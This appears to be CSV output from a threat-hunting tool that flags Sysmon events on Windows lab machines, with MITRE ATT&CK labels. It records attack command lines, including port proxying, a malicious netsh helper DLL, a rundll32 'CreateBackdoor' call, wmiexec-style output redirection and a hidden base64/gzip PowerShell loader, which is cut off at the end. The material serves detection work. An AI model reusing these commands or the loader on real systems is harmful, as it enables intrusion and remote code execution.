747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 56509 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-11-03 13:51:56.380 + 747F3D96-DB7C-5DBE-0000-0010CF6B9502 + 5004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt + C:\Windows\system32\ + MSEDGEWIN10\sqlsvc + 747F3D96-CE3B-5DBE-0000-00201ED50100 + 0x1d51e + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CE42-5DBE-0000-0010EE430200 + 3936 + C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe + "c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.470 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50008 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 49666 + + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4948 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.355 + 747F3D96-6646-5D3F-0000-001029398B00 + 6760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589974 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.467 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50007 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 135 + epmap + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4947 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.336 + 747F3D96-6646-5D3F-0000-001051388B00 + 3824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh.exe add helper AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI